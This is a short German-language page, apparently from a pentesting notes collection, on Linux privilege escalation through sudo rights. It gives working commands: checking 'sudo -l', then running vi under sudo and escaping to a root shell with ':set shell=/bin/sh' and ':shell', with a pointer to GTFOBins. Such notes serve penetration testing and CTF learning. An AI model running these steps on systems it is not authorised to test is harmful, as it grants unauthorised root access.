sudo rechte ausnutzen

✍️ sudo -l nutzen

Immer testen:

sudo -l

➡️ Zeigt dir, was du mit sudo ohne Passwort ausführen darfst (oder mit bekanntem Passwort)

⚡ Beispiel: vi darf mit sudo ausgeführt werden

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

Dann in vi:

:set shell=/bin/sh
:shell

➡️ Du bekommst eine Root-Shell, da vi mit Root-Rechten läuft

🔗 Warum funktioniert das?

  • vi verliert unter sudo nicht seine Rechte

  • :shell oder :!sh startet Subshell mit gleichen Privilegien

🔍 Tipp: GTFOBins

Immer checken, ob ein Befehl Root-Zugriff erlaubt: https://gtfobins.github.io

Beispielseite: vi → https://gtfobins.github.io/gtfobins/vi/#sudo

PreviousPrivilege escalationNextLinux mit GTFOBins

Last updated